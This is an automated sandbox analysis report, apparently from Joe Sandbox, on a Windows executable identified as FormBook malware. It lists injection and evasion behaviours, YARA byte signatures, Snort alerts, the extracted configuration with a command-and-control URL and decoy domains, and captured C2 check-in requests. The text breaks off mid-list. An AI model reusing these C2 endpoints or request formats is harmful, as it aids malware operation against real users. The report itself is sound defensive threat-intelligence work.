Play interactive tourEdit tour

# Windows Analysis Report 2u2u8wnrrW.exe

## Overview

### General Information

 Sample Name: 2u2u8wnrrW.exe Analysis ID: 502325 MD5: 51dcc89ed1035a6c2fc57ada8dcb4dc2 SHA1: 0e59efbffdd8153c61f20a6039110474c50c20e9 SHA256: 092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14 Tags: exeFormbook Infos: Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

### Classification

 System is w10x642u2u8wnrrW.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)2u2u8wnrrW.exe (PID: 7164 cmdline: C:\Users\user\Desktop\2u2u8wnrrW.exe MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)chkdsk.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)cmd.exe (PID: 3324 cmdline: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup
``{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}``
SourceRuleDescriptionAuthorStrings
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x16ae9:\$sqlite3step: 68 34 1C 7B E1
• 0x16bfc:\$sqlite3step: 68 34 1C 7B E1
• 0x16b18:\$sqlite3text: 68 38 2A 90 C5
• 0x16c3d:\$sqlite3text: 68 38 2A 90 C5
• 0x16b2b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x16c53:\$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 24 entries
SourceRuleDescriptionAuthorStrings
3.2.2u2u8wnrrW.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.2u2u8wnrrW.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x7818:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x7bb2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x138c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x133b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x139c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x13b3f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x85ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1262c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x9342:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18db7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x19e5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.2u2u8wnrrW.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15ce9:\$sqlite3step: 68 34 1C 7B E1
• 0x15dfc:\$sqlite3step: 68 34 1C 7B E1
• 0x15d18:\$sqlite3text: 68 38 2A 90 C5
• 0x15e3d:\$sqlite3text: 68 38 2A 90 C5
• 0x15d2b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15e53:\$sqlite3blob: 68 53 D8 7F 8C
3.2.2u2u8wnrrW.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.2u2u8wnrrW.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8618:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x89b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x146c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x141b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x147c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1493f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x93ca:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1342c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa142:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19bb7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ac5a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 8 entries

## Sigma Overview

No Sigma rule has matched

## Jbx Signature Overview

### AV Detection:

 Found malware configuration Show sources
 Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
 Multi AV Scanner detection for submitted file Show sources
 Source: 2u2u8wnrrW.exe Virustotal: Detection: 16% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Uses Microsoft's Enhanced Cryptographic Provider Show sources
 Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 11_2_0538387E GetEncryptedFileVersionExt, 11_2_0538387E Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 11_2_0537A61C GetEncryptedFileVersionExt, 11_2_0537A61C
 Uses 32bit PE files Show sources
 Source: 2u2u8wnrrW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: 2u2u8wnrrW.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: chkdsk.pdbGCTL source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp Source: Binary string: chkdsk.pdb source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp Source: Binary string: wntdll.pdbUGP source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: 2u2u8wnrrW.exe, chkdsk.exe
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\2u2u8wnrrW.exe Code function: 4x nop then pop ebx 3_2_00406AB9 Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop ebx 11_2_00AB6AB9

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
 System process connects to network (likely due to code injection or exploit) Show sources
 C2 URLs / IPs found in malware configuration Show sources
 Source: Malware configuration extractor URLs: www.esyscoloradosprings.com/fqiq/
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1Host: www.satellitephonstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1Host: www.driventow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1Host: www.kangrungao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:38 GMTContent-Type: text/htmlContent-Length: 275ETag: "615c5dca-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:50 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: Virus/Spyware Download Bloc
 URLs found in memory or binary data Show sources
 Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: 2u2u8wnrrW.exe, 